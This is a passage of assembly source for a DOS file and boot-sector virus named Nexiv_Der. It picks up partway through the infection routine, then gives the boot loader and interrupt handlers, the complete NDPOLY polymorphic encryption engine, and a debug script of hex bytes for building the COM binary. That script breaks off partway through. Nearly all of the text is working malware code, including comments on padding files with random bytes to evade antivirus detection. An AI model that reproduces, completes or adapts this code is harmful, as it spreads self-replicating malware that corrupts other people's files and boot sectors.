ds:file_attrib,cx ; Save file attributes mov ax,4301h mov dx,offset file_name xor cx,cx int 21h ; Reset file attributes mov ax,3D02h mov dx,offset file_name int 21h ; Open the file in ; Read&Write jnc loc1_infect jmp exit_infect loc1_infect: mov bx,ax ; BX = file handle mov ax,5700h int 21h ; Get file date mov ds:file_time,cx mov ds:file_date,dx ; Save file date mov ax,4200h xor cx,cx mov dx,ds:call_position int 21h ; Point to the selected ; instruction for the ; virus jump mov ah,3Fh mov cx,3 mov dx,offset host_bytes_cmp int 21h ; Read the bytes that will ; be overwritten by the ; virus jump mov si,offset host_bytes mov di,offset host_bytes_cmp mov cx,3 repe cmpsb ; Check if the selected ; instruction is really ; present in the file in ; that position. If the ; file is compressed the ; check will fail jz file_not_compressed jmp close_infect file_not_compressed: mov ax,ds:file_time ; Get file time and ax,1Fh ; Get only seconds cmp ax,5 ; Are the seconds 5? jb loc2_infect cmp ax,6 ; Are the file seconds ; 6? ja loc2_infect inc ax ; If yes, increment by ; 1 jmp loc3_infect loc2_infect: mov ax,5 ; Otherwise set to 5 loc3_infect: and ds:file_time,0FFE0h ; Delete original file ; seconds or ds:file_time,ax ; Put the new ones mov ax,4200h xor cx,cx mov dx,ds:call_position int 21h ; Point to the position of ; the virus jump mov ax,ds:virus_position sub ax,ds:call_position sub ax,3 mov ds:call_virus_offset,ax ; Calculate the lenght of ; the jump needed to ; reach the virus push bx mov ah,62h int 21h ; Ask host segment dec bx mov ds,bx mov ax,ds:[10h + 2] sub ax,(offset virus_disc_end-offset virus_start+0A00h)/10h+1 mov es,ax pop bx push cs pop ds mov ah,40h mov cx,3 mov dx,offset call_virus int 21h ; Write virus jump mov ax,4200h xor cx,cx mov dx,ds:virus_position int 21h ; Point the file to the ; position where the virus ; will be written loop1_create_poly_file: push cs pop ds mov ah,2 ; Generate file code mov al,0Fh ; High Polymorphism mov cx,offset virus_disc_end - offset virus_start mov dx,offset virus_start call poly ; Call the poly engine cmp cx,(offset virus_disc_end-offset virus_start)+0A00h ja loop1_create_poly_file mov ah,40h int 21h ; Write the virus at host mov ax,40h mov ds,ax in al,40h ; AL = random mov ah,0 mov cx,ax ; 0 < CX < 255 mov ah,40h xor dx,dx int 21h ; Write some random bytes ; at the host tail to fool ; antiviruses push cs pop ds push cs pop es close_infect: mov ax,5701h mov cx,ds:file_time mov dx,ds:file_date int 21h ; Set file date mov ah,3Eh int 21h ; Close the file mov ax,4301h mov cx,ds:file_attrib mov dx,offset file_name int 21h ; Restore file attributes exit_infect: mov ax,2524h mov dx,ds:ip24 mov ds,ds:cs24 int 21h ; Restore Int 24h vector jmp exit_trace ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Int 24h Handler int_24_entry: mov al,3 iret ; If error occours ; automatically leave ; the operation ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; The loader that is inserted in the infected boot loader label loader1 label jmp short $ + pos_loader nop loader2 label cli xor ax,ax mov ss,ax mov sp,7C00h ; Incialize the stack push dx ; Save DX because it ; contains the drive from ; which the boot has been ; executed loader3 label pop dx push cs pop ds push cs pop es sti cld cmp dl,80h ; Is booting from the ; hard disk? jne loc1_loader mov cx,6 ; Cylinder 0 / Sector 6 mov dh,0 ; Side 0 jmp loc2_loader loc1_loader: mov cx,4F01h ; Cylinder 79 / Sector 1 mov dh,1 ; Side 1 jmp loc2_loader loc2_loader: loop1_loader: mov ax,200h+(offset virus_disc_end-offset virus_start+0A00h+1FFh)/200h ; Read sectors mov bx,7C00h + 200h int 13h ; Read the original boot ; and the virus body jc loop1_loader add bx,200h jmp bx ; Execute the virus body loader4 label ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Int 13h with retry int13_retry: push ax int 13h ; Do it pop ax jnc loc1_int13_retry ; Error? int 13h ; Then do it again loc1_int13_retry: ret ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Original Int 13h with retry int13_orig_retry: push ax pushf call dword ptr cs:ip13 ; Do it pop ax jnc loc1_int13_orig_retry ; Error? pushf call dword ptr cs:ip13 ; Then do it again loc1_int13_orig_retry: ret ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Polymorphic engine ; It isn't commented because it is enourmous, badly written and doesn't ; work correctly include ndpoly.asm ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß mz_counter db ? ; Goes from 3 a 0, is ; used to wait that the ; DOS is loaded before ; hooking the Int 21h host_bytes db 3 dup (?) ; The original host 3 ; bytes overwritten by ; the virus jump first_gen db 1 ; If 1 the virus assumes ; it is a first generation ; so it doesn't check the ; checksum and doesn't ; execute the host file_name db 64 dup (?) ; Buffer for the filename ; of the file that is ; being infected file_length dw ? ; File lenght file_buffer db 32 dup (?) ; First 32 bytes of the ; file. Used by the ; routine that inserts a ; Int 3 at the start of ; the host ip01 dw ? cs01 dw ? ; Int 1 vector ip03 dw ? cs03 dw ? ; Int 3 vector ip24 dw ? cs24 dw ? ; Int 24h vector host_segment dw ? ; Segment of the file that ; we are going to infect inst_counter dw ? ; Numeber of instructions ; that the virus will ; execute before inserting ; his own jump call_position dw ? ; Virus jump position virus_position dw ? ; Virus position in the ; file that the virus is ; going to infect host_bytes_cmp db 3 dup (?) ; Here are readed the 3 ; bytes that are ; overwritten by the virus ; jump to check if they ; are really located there ; and the file isn't ; encrypted or compressed call_virus db 0E8h ; Jump to the virus (CALL) call_virus_offset dw ? ; Offset of the virus jump file_attrib dw ? ; Attibute of the file that ; we are going to infect file_time dw ? ; File timestamp file_date dw ? ; File date db 'Nexiv_Der takes on your files',0 ; Author message never ; used. ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; End of the bytes that are included in the checksum calculation checksum_end label ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Virus checksum virus_checksum dw ? ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; End of the virus bytes on disk virus_disc_end label ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Buffer for reading/writing a sector sector_buffer db 200h dup (?) ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; End of the virus bytes in mem virus_mem_end label ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; The end endp nexivder seg_a ends end start ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß [EOF] ;=[END NEXIVDER.ASM]========================================================= ;=[BEGIN NDPOLY.ASM]========================================================= ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; Nexiv_Der Polymorphic Engine ; ; IN regs: ; AH = Type of code to be generated (1 = loader / 2 = file / 3 = boot) ; AL = How much trash will be inserted between two instructions in the ; decryption routine (must be a (a power of 2) - 1) ; DS:DX = Code to encrypt ; CX = Lenght of the code to encrypt ; ES:0 = Free mem zone (used for the code construction) ; ; OUT regs: ; DS:DX = Polymorphic code generated (Out.DS:Out.DX = In.ES:0) ; CX = DI = Lenght of the generated polymorphic code ; BX = preserved ; ES = preserved ; SI = trashed ; BP = trashed poly: push bx mov byte ptr ds:poly_data43,ah and byte ptr ds:poly_data43,1 shr ah,1 mov byte ptr ds:poly_data48,ah and byte ptr ds:poly_data48,1 mov byte ptr ds:poly_data44,al mov word ptr ds:poly_data45,cx mov word ptr ds:poly_data46,dx poly_loc1: xor di,di call poly_sub2 call poly_sub3 cmp byte ptr ds:poly_data43,1 je poly_loc2 mov byte ptr ds:poly_data47,1 mov al,9Ch stosb call poly_sub3 poly_loc2: cmp byte ptr ds:poly_data43,1 je poly_loc4 mov cx,7 poly_locloop3: push cx call poly_sub7 call poly_sub3 pop cx loop poly_locloop3 poly_loc4: cmp byte ptr ds:poly_data43,1 je poly_loc6 mov cx,2 poly_locloop5: push cx call poly_sub8 call poly_sub3 pop cx loop poly_locloop5 poly_loc6: mov al,0Eh stosb mov al,1Fh stosb call poly_sub3 mov al,0Eh stosb mov al,7 stosb call poly_sub3 call poly_sub11 call poly_sub3 call poly_sub12 call poly_sub3 call poly_sub13 call poly_sub3 call poly_sub14 call poly_sub3 call poly_sub15 call poly_sub4 mov poly_data37,di call poly_sub4 call poly_sub16 call poly_sub4 call poly_sub4 call poly_sub17 call poly_sub4 call poly_sub18 call poly_sub4 call poly_sub19 mov byte ptr ds:poly_data47,0 call poly_sub4 mov byte ptr ds:poly_data47,1 call poly_sub20 call poly_sub21 mov byte ptr poly_data40,0FFh mov byte ptr poly_data41,0FFh call poly_sub3 cmp byte ptr ds:poly_data43,1 je poly_loc8 mov cx,2 poly_locloop7: push cx call poly_sub10 call poly_sub3 pop cx loop poly_locloop7 poly_loc8: cmp byte ptr ds:poly_data43,1 je poly_loc10 mov cx,7 poly_locloop9: push cx call poly_sub9 call poly_sub3 pop cx loop poly_locloop9 poly_loc10: cmp byte ptr ds:poly_data43,1 je poly_loc11 mov byte ptr ds:poly_data47,0 mov al,9Dh stosb call poly_sub3 poly_loc11: cmp byte ptr ds:poly_data48,0 je poly_loc13 poly_loc12: mov ax,di and ax,0Fh cmp al,0Fh je poly_loc13 mov al,90h stosb jmp poly_loc12 poly_loc13: mov bx,di push bx mov al,0CBh stosb call checksum mov ds:virus_checksum,bx mov bx,poly_data39 sub es:[bx],di mov si,word ptr ds:poly_data46 mov cx,word ptr ds:poly_data45 rep movsb push di push ds push es push cs mov ax,offset poly_loc104 push ax push es xor ax,ax push ax retf poly_loc104: pop es pop ds pop di pop bx mov byte ptr es:[bx],90h push di mov si,ds:poly_data46 mov di,bx inc di mov cx,ds:poly_data45 xor ax,ax poly_locloop14: cmpsb jnz poly_loc15 inc ax poly_loc15: loop poly_locloop14 mov cx,ds:poly_data45 shr cx,1 cmp ax,cx jb poly_loc16 jmp poly_loc1 poly_loc16: pop di mov cx,di xor dx,dx push es pop ds pop bx ret poly_sub2: mov al,ds:poly_data43 mov ds:poly_data47,al mov ds:poly_data24,al mov ds:poly_data25,al mov ds:poly_data26,al mov ds:poly_data27,al mov ds:poly_data28,al mov ds:poly_data29,al mov ds:poly_data30,al mov ds:poly_data32,al mov ds:poly_data31,al mov bx,offset poly_data33 mov cx,7 poly_locloop17: mov byte ptr [bx],0FFh inc bx loop poly_locloop17 mov bx,offset poly_data35 mov cx,2 poly_locloop18: mov byte ptr [bx],0FFh inc bx loop poly_locloop18 mov byte ptr ds:poly_data40,0FFh mov byte ptr ds:poly_data41,0FFh ret poly_sub3: call poly_sub22 and al,byte ptr ds:poly_data44 mov ah,0 inc ax mov cx,ax poly_locloop19: push cx call poly_sub22 mov ah,0 poly_loc20: cmp ax,offset poly_label3 - offset poly_label1 jb poly_loc21 sub ax,offset poly_label3 - offset poly_label1 jmp poly_loc20 poly_loc21: and ax,0FFFEh add ax,offset poly_label1 mov bx,ax mov ax,[bx] call ax pop cx loop poly_locloop19 ret poly_sub4: call poly_sub22 and al,byte ptr ds:poly_data44 mov ah,0 inc ax mov cx,ax poly_locloop22: push cx call poly_sub22 mov ah,0 poly_loc23: cmp ax,offset poly_label3 - offset poly_label2 jb poly_loc24 sub ax,offset poly_label3 - offset poly_label2 jmp poly_loc23 poly_loc24: and ax,0FFFEh add ax,offset poly_label2 mov bx,ax mov ax,[bx] call ax pop cx loop poly_locloop22 ret poly_label1 label dw [poly_loc91] dw [poly_loc92] dw [poly_loc93] dw [poly_loc94] dw [poly_loc95] dw [poly_loc95] dw [poly_loc96] dw [poly_loc96] dw [poly_loc97] poly_label2 label dw [poly_loc98] dw [poly_loc98] dw [poly_loc99] dw [poly_loc99] dw [poly_loc100] dw [poly_loc100] dw [poly_loc101] dw [poly_loc101] dw [poly_loc102] dw [poly_loc102] dw [poly_loc103] dw [poly_loc103] poly_label3 label poly_sub7: poly_loc25: mov bx,offset poly_data24 call poly_sub22 and ax,7 add bx,ax cmp byte ptr [bx],0 jne poly_loc25 mov byte ptr [bx],1 mov bx,offset poly_data33 poly_loc26: cmp byte ptr [bx],0FFh je poly_loc27 inc bx jmp poly_loc26 poly_loc27: mov [bx],al or al,50h stosb ret poly_sub8: poly_loc28: mov bx,offset poly_data31 call poly_sub22 and ax,3 add bx,ax cmp byte ptr [bx],0 jne poly_loc28 mov byte ptr [bx],1 mov bx,offset poly_data35 poly_loc29: cmp byte ptr [bx],0FFh je poly_loc30 inc bx jmp poly_loc29 poly_loc30: mov [bx],al shl al,1 shl al,1 shl al,1 or al,6 stosb ret poly_sub9: mov bx,offset poly_data34 poly_loc31: cmp byte ptr [bx],0FFh jne poly_loc32 dec bx jmp poly_loc31 poly_loc32: mov al,[bx] mov byte ptr [bx],0FFh mov bx,offset poly_data24 mov ah,0 add bx,ax mov byte ptr [bx],0 or al,58h stosb ret poly_sub10: mov bx,offset poly_data36 poly_loc33: cmp byte ptr [bx],0FFh jne poly_loc34 dec bx jmp poly_loc33 poly_loc34: mov al,[bx] mov byte ptr [bx],0FFh shl al,1 shl al,1 shl al,1 or al,7 stosb ret poly_sub11: mov al,0E8h stosb call poly_sub22 and ax,0Fh stosw mov poly_data38,di cmp al,0 je poly_locret_36 mov cx,ax poly_locloop35: push cx call poly_sub22 stosb pop cx loop poly_locloop35 poly_locret_36: ret poly_sub12: poly_loc37: call poly_sub24 cmp al,3 je poly_loc38 cmp al,6 je poly_loc38 cmp al,7 jne poly_loc37 poly_loc38: mov poly_data40,al push ax or al,58h stosb pop ax ret poly_sub13: mov al,81h stosb mov al,poly_data40 or al,0E8h stosb mov poly_data39,di mov ax,poly_data38 stosw ret poly_sub14: call poly_sub22 and al,2 or al,31h stosb call poly_sub26 mov poly_data41,al mov ah,al shl ah,1 shl ah,1 shl ah,1 or al,ah or al,0C0h stosb ret poly_sub15: call poly_sub25 mov poly_data42,al and al,3 or al,0B8h stosb call poly_sub23 stosw ret poly_sub16: call poly_sub22 and al,3 cmp al,2 je poly_loc39 cmp al,1 je poly_loc40 jmp poly_loc41 poly_loc39: mov al,26h stosb jmp poly_loc41 poly_loc40: mov al,2Eh stosb jmp poly_loc41 poly_loc41: mov al,30h stosb cmp byte ptr poly_data40,3 je poly_loc42 cmp byte ptr poly_data40,6 je poly_loc43 mov al,5 jmp poly_loc44 poly_loc42: mov al,7 jmp poly_loc44 poly_loc43: mov al,4 jmp poly_loc44 poly_loc44: mov ah,poly_data42 shl ah,1 shl ah,1 shl ah,1 or al,ah stosb ret poly_sub17: poly_loc45: call poly_sub22 and al,7 cmp al,0 je poly_loc46 cmp al,1 je poly_loc47 cmp al,2 je poly_loc48 cmp al,3 je poly_loc49 cmp al,4 je poly_loc50 jmp poly_loc45 poly_loc46: mov al,poly_data40 or al,40h stosb ret poly_loc47: mov al,83h stosb mov al,poly_data40 or al,0C0h stosb mov al,1 stosb ret poly_loc48: mov al,81h stosb mov al,poly_data40 or al,0C0h stosb mov ax,1 stosw ret poly_loc49: mov al,83h stosb mov al,poly_data40 or al,0E8h stosb mov al,0FFh stosb ret poly_loc50: mov al,81h stosb mov al,poly_data40 or al,0E8h stosb mov ax,0FFFFh stosw ret poly_sub18: poly_loc51: call poly_sub22 and al,7 cmp al,0 je poly_loc52 cmp al,1 je poly_loc53 cmp al,2 je poly_loc54 cmp al,3 je poly_loc55 cmp al,4 je poly_loc56 jmp poly_loc51 poly_loc52: mov al,poly_data41 or al,40h stosb ret poly_loc53: mov al,83h stosb mov al,poly_data41 or al,0C0h stosb mov al,1 stosb ret poly_loc54: mov al,81h stosb mov al,poly_data41 or al,0C0h stosb mov ax,1 stosw ret poly_loc55: mov al,83h stosb mov al,poly_data41 or al,0E8h stosb mov al,0FFh stosb ret poly_loc56: mov al,81h stosb mov al,poly_data41 or al,0E8h stosb mov ax,0FFFFh stosw ret poly_sub19: mov al,81h stosb mov al,poly_data41 or al,0F8h stosb call poly_sub22 and ax,0Fh add ax,word ptr ds:poly_data45 stosw ret poly_sub20: mov al,74h stosb mov al,3 stosb ret poly_sub21: mov ax,di sub ax,poly_data37 add ax,3 neg ax push ax mov al,0E9h stosb pop ax stosw ret poly_data43 db ? poly_data48 db ? poly_data44 db ? poly_data45 dw ? poly_data46 dw ? poly_data47 db ? poly_data24 db ? poly_data25 db ? poly_data26 db ? poly_data27 db ? db ? poly_data28 db ? poly_data29 db ? poly_data30 db ? poly_data31 db 3 dup (?) poly_data32 db ? poly_data33 dw 3 dup (?) poly_data34 db ? poly_data35 db ? poly_data36 db ? poly_data37 dw ? poly_data38 dw ? poly_data39 dw 2 dup (?) poly_data40 db ? poly_data41 db ? poly_data42 db ? poly_sub22: in al,40h ret poly_sub23: in al,40h mov ah,al in al,40h ret poly_sub24: poly_loc57: in al,40h and al,7 cmp al,4 je poly_loc57 cmp poly_data40,al je poly_loc57 cmp poly_data41,al je poly_loc57 ret poly_sub25: poly_loc58: in al,40h and al,7 push ax and al,3 cmp poly_data40,al pop ax jz poly_loc58 push ax and al,3 cmp poly_data41,al pop ax jz poly_loc58 ret poly_sub26: poly_loc59: call poly_sub28 jc poly_locret_60 call poly_sub24 mov ah,0 mov bx,offset poly_data24 add bx,ax cmp byte ptr [bx],1 jne poly_loc59 clc poly_locret_60: ret poly_sub27: poly_loc61: call poly_sub29 jc poly_locret_62 call poly_sub25 push ax mov ah,0 and al,3 mov bx,offset poly_data24 add bx,ax pop ax cmp byte ptr [bx],1 jne poly_loc61 clc poly_locret_62: ret poly_sub28: mov bx,offset poly_data24 mov cx,8 poly_locloop63: cmp byte ptr [bx],1 je poly_loc64 inc bx loop poly_locloop63 stc ret poly_loc64: clc ret poly_sub29: mov bx,offset poly_data24 mov cx,4 poly_locloop65: cmp byte ptr [bx],1 je poly_loc66 inc bx loop poly_locloop65 stc ret poly_loc66: clc ret poly_sub30: push ax and al,80h pop ax jz poly_loc67 cmp poly_data24,1 jne poly_loc75 poly_loc67: push ax and al,40h pop ax jz poly_loc68 cmp poly_data25,1 jne poly_loc75 poly_loc68: push ax and al,20h pop ax jz poly_loc69 cmp poly_data26,1 jne poly_loc75 poly_loc69: push ax and al,10h pop ax jz poly_loc70 cmp poly_data27,1 jne poly_loc75 poly_loc70: push ax and al,8 pop ax jz poly_loc71 cmp byte ptr ds:poly_data47,1 jne poly_loc75 poly_loc71: push ax and al,4 pop ax jz poly_loc72 cmp poly_data28,1 jne poly_loc75 poly_loc72: push ax and al,2 pop ax jz poly_loc73 cmp poly_data29,1 jne poly_loc75 poly_loc73: push ax and al,1 pop ax jz poly_loc74 cmp poly_data30,1 jne poly_loc75 poly_loc74: clc ret poly_loc75: stc ret poly_loc91: call poly_sub26 jc poly_locret_76 or al,0B8h stosb call poly_sub23 stosw poly_locret_76: ret poly_loc92: call poly_sub27 jc poly_locret_77 or al,0B0h stosb call poly_sub22 stosb poly_locret_77: ret poly_loc98: mov al,8 call poly_sub30 jc poly_locret_79 call poly_sub26 jc poly_locret_79 push ax mov al,81h stosb poly_loc78: call poly_sub22 and al,38h cmp al,10h je poly_loc78 cmp al,18h je poly_loc78 mov bl,al pop ax or al,bl or al,0C0h stosb call poly_sub23 stosw poly_locret_79: ret poly_loc99: mov al,8 call poly_sub30 jc poly_locret_81 call poly_sub27 jc poly_locret_81 push ax mov al,80h stosb poly_loc80: call poly_sub22 and al,38h cmp al,10h je poly_loc80 cmp al,18h je poly_loc80 mov bl,al pop ax or al,bl or al,0C0h stosb call poly_sub22 stosb poly_locret_81: ret poly_loc93: call poly_sub26 jc poly_locret_82 push ax mov al,89h stosb call poly_sub26 shl al,1 shl al,1 shl al,1 mov bl,al pop ax or al,bl or al,0C0h stosb poly_locret_82: ret poly_loc94: call poly_sub27 jc poly_locret_83 push ax mov al,88h stosb call poly_sub27 shl al,1 shl al,1 shl al,1 mov bl,al pop ax or al,bl or al,0C0h stosb poly_locret_83: ret poly_loc95: mov al,8 call poly_sub30 jc poly_locret_84 call poly_sub26 jc poly_locret_84 push ax call poly_sub22 and al,3Ah or al,1 stosb call poly_sub26 shl al,1 shl al,1 shl al,1 mov bl,al pop ax or al,bl or al,0C0h stosb poly_locret_84: ret poly_loc96: mov al,8 call poly_sub30 jc poly_locret_85 call poly_sub27 jc poly_locret_85 push ax call poly_sub22 and al,3Ah stosb call poly_sub27 shl al,1 shl al,1 shl al,1 mov bl,al pop ax or al,bl or al,0C0h stosb poly_locret_85: ret poly_loc97: call poly_sub26 jc poly_locret_86 or al,50h stosb call poly_sub26 or al,58h stosb poly_locret_86: ret poly_loc100: mov al,8 call poly_sub30 jc poly_locret_87 call poly_sub26 jc poly_locret_87 push ax call poly_sub22 and al,8 or al,40h mov bl,al pop ax or al,bl stosb poly_locret_87: ret poly_loc101: mov al,8 call poly_sub30 jc poly_locret_88 call poly_sub27 jc poly_locret_88 push ax mov al,0FEh stosb call poly_sub22 and al,8 or al,0C0h mov bl,al pop ax or al,bl stosb poly_locret_88: ret poly_loc102: mov al,8 call poly_sub30 jc poly_locret_89 call poly_sub26 jc poly_locret_89 push ax mov al,0D1h stosb call poly_sub22 and al,8 or al,0C0h mov bl,al pop ax or al,bl stosb poly_locret_89: ret poly_loc103: mov al,8 call poly_sub30 jc poly_locret_90 call poly_sub27 jc poly_locret_90 push ax mov al,0D0h stosb call poly_sub22 and al,8 or al,0C0h mov bl,al pop ax or al,bl stosb poly_locret_90: ret ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ;=[END NDPOLY.ASM]=========================================================== ;=[BEGIN NEXIVDER.SCR]======================================================= N NEXIVDER.COM E 0100 0E E8 01 00 C3 9C 50 53 51 52 56 57 55 1E 06 FB E 0110 FC E8 00 00 58 2D 14 01 B1 04 D3 E8 8C CB 03 C3 E 0120 50 B8 26 01 50 CB 0E 1F 81 FC E8 7B 74 47 80 3E E 0130 8D 0F 01 74 11 8B EC 83 6E 18 03 8B 7E 18 8E 46 E 0140 16 BE 8A 0F A4 A5 0E 07 80 3E 8D 0F 01 74 09 E8 E 0150 88 00 39 1E 2E 10 75 12 C6 06 8D 0F 00 B8 4E 30 E 0160 CD 21 80 FC 30 74 03 E8 80 00 07 1F 5D 5F 5E 5A E 0170 59 5B 58 9D CB FA BC 00 7C FB 33 C0 8E D8 8E C0 E 0180 BE 00 7E BF 00 7C B9 00 02 F3 A4 A1 4C 00 2E A3 E 0190 B7 03 A1 4E 00 2E A3 B9 03 2E C6 06 89 0F 03 A1 E 01A0 13 04 2D 05 00 A3 13 04 B1 06 D3 E0 2D 10 00 8E E 01B0 C0 0E 1F BE 00 01 BF 00 01 B9 30 11 F3 A4 33 C0 E 01C0 8E D8 C7 06 4C 00 29 03 8C 06 4E 00 E8 BC 00 33 E 01D0 C0 8E D8 8E C0 EA 00 7C 00 00 BE 00 01 B9 2E 0F E 01E0 33 DB B4 00 AC 03 D8 E2 FB C3 B4 62 CD 21 4B 8E E 01F0 DB A1 12 00 2D 94 01 8E C0 0E 1F B8 01 02 33 DB E 0200 B9 01 00 BA 80 01 E8 74 06 26 80 7F 01 45 75 02 E 0210 EB 76 B8 01 03 33 DB B9 06 00 BA 80 00 E8 5D 06 E 0220 BE 47 08 33 FF B9 03 00 F3 A4 BF 47 00 B9 09 00 E 0230 F3 A4 06 8C C0 05 05 00 8E C0 B4 01 B0 0F B9 2A E 0240 00 BA 53 08 E8 50 06 0E 1F 81 F9 AE 01 77 EB 07 E 0250 26 C7 06 FE 01 55 AA B8 01 03 33 DB B9 01 00 BA E 0260 80 01 E8 18 06 B4 03 B0 0F B9 30 0F BA 00 01 E8 E 0270 25 06 0E 1F 81 F9 30 19 77 EB B8 0D 03 33 DB B9 E 0280 07 00 BA 80 00 E8 F5 05 0E 07 C3 A1 13 04 2D 07 E 0290 00 B1 06 D3 E0 8E C0 0E 1F B8 01 02 33 DB B9 01 E 02A0 00 BA 80 01 E8 D6 05 26 80 7F 01 45 75 02 EB 76 E 02B0 B8 01 03 33 DB B9 06 00 BA 80 00 E8 BF 05 BE 47 E 02C0 08 33 FF B9 03 00 F3 A4 BF 47 00 B9 09 00 F3 A4 E 02D0 06 8C C0 05 05 00 8E C0 B4 01 B0 0F B9 2A 00 BA E 02E0 53 08 E8 B2 05 0E 1F 81 F9 AE 01 77 EB 07 26 C7 E 02F0 06 FE 01 55 AA B8 01 03 33 DB B9 01 00 BA 80 01 E 0300 E8 7A 05 B4 03 B0 0F B9 30 0F BA 00 01 E8 87 05 E 0310 0E 1F 81 F9 30 19 77 EB B8 0D 03 33 DB B9 07 00 E 0320 BA 80 00 E8 57 05 0E 07 C3 2E 80 3E 89 0F 00 75 E 0330 1F 3D 01 02 75 1A 83 F9 01 75 15 81 FA 80 01 75 E 0340 0F 51 52 B9 06 00 B6 00 E8 3B 05 5A 59 CA 02 00 E 0350 80 FC 02 75 4D 2E 80 3E 89 0F 00 74 45 9C 2E FF E 0360 1E B7 03 9C 26 81 3F 4D 5A 75 33 2E FE 0E 89 0F E 0370 2E 80 3E 89 0F 00 75 26 2E C6 06 D0 0F 00 50 1E E 0380 33 C0 8E D8 A1 84 00 2E A3 97 04 A1 86 00 2E A3 E 0390 99 04 C7 06 84 00 8C 04 8C 0E 86 00 1F 58 9D CA E 03A0 02 00 3D 01 02 75 0F 83 F9 01 75 0A 80 FE 00 75 E 03B0 05 80 FA 01 76 05 EA 00 00 00 00 9C 2E FF 1E B7 E 03C0 03 9C 50 53 51 52 56 57 55 1E 06 73 03 E9 AF 00 E 03D0 FB FC 0E 1F 26 80 7F 01 45 74 F2 26 81 7F 13 40 E 03E0 0B 75 EA 06 1F 8C C8 05 10 00 05 F4 00 8E C0 8B E 03F0 F3 33 FF B9 00 02 F3 A4 0E 1F B8 01 03 33 DB B9 E 0400 01 4F B6 01 E8 7F 04 72 76 BE 47 08 33 FF B9 03 E 0410 00 F3 A4 BF 47 00 B9 09 00 F3 A4 8C C0 05 05 00 E 0420 8E C0 52 B4 01 B0 0F B9 2A 00 BA 53 08 E8 67 04 E 0430 0E 1F 81 F9 AE 01 77 EB 26 C7 06 AE 01 55 AA 5A E 0440 8C C0 2D 05 00 8E C0 B8 01 03 33 DB B9 01 00 B6 E 0450 00 E8 32 04 72 29 33 ED 52 B8 01 02 33 DB B9 07 E 0460 00 03 CD BA 80 00 E8 1D 04 5A B8 01 03 33 DB B9 E 0470 02 4F 03 CD B6 01 E8 0D 04 45 83 FD 0D 75 D9 07 E 0480 1F 5D 5F 5E 5A 59 5B 58 9D CA 02 00 3D 4E 30 74 E 0490 0A 3D 00 4B 74 06 EA 00 00 00 00 CF 50 53 51 52 E 04A0 56 57 55 1E 06 FB FC 0E 07 8B F2 BF 8E 0F B9 40 E 04B0 00 F3 A4 0E 1F B8 00 3D BA 8E 0F CD 21 73 03 E9 E 04C0 84 00 8B D8 B4 3F B9 20 00 BA D0 0F CD 21 3D 20 E 04D0 00 75 66 81 3E D0 0F 5A 4D 74 5E 81 3E D0 0F 4D E 04E0 5A 74 56 B8 00 57 CD 21 83 E1 1F 83 F9 07 74 49 E 04F0 B8 02 42 33 C9 33 D2 CD 21 83 FA 00 75 3B 3D E8 E 0500 03 72 36 3D D8 D6 77 31 A3 CE 0F B8 03 35 CD 21 E 0510 89 1E F4 0F 8C 06 F6 0F B8 13 35 CD 21 89 1E 54 E 0520 06 8C 06 56 06 0E 07 B8 03 25 BA 93 05 CD 21 B8 E 0530 13 25 BA 1F 06 CD 21 EB 05 C6 06 D0 0F 00 B4 3E E 0540 CD 21 B4 0D CD 21 07 1F 5D 5F 5E 5A 59 5B 58 9C E 0550 2E FF 1E 97 04 2E C6 06 D0 0F 00 9C 50 52 1E B8 E 0560 01 25 2E 8B 16 F0 0F 2E 8E 1E F2 0F CD 21 B8 03 E 0570 25 2E 8B 16 F4 0F 2E 8E 1E F6 0F CD 21 B8 13 25 E 0580 2E 8B 16 54 06 2E 8E 1E 56 06 CD 21 1F 5A 58 9D E 0590 CA 02 00 9C 50 53 51 52 56 57 55 1E 06 FB FC 0E E 05A0 1F BE D0 0F BF 00 01 B9 20 00 F3 A4 C6 06 D0 0F E 05B0 00 B4 0D CD 21 BF 00 01 03 3E CE 0F B0 4E B9 90 E 05C0 2D F3 AA 8C 06 FC 0F B8 01 35 CD 21 89 1E F0 0F E 05D0 8C 06 F2 0F B8 01 25 BA 58 06 CD 21 B8 03 25 8B E 05E0 16 F4 0F 8E 1E F6 0F CD 21 B8 13 25 2E 8B 16 54 E 05F0 06 2E 8E 1E 56 06 CD 21 0E 1F E4 40 24 03 8A E0 E 0600 E4 40 05 00 01 A3 FE 0F 07 1F 5D 5F 5E 5A 59 5B E 0610 58 9D 55 8B EC FF 4E 02 81 4E 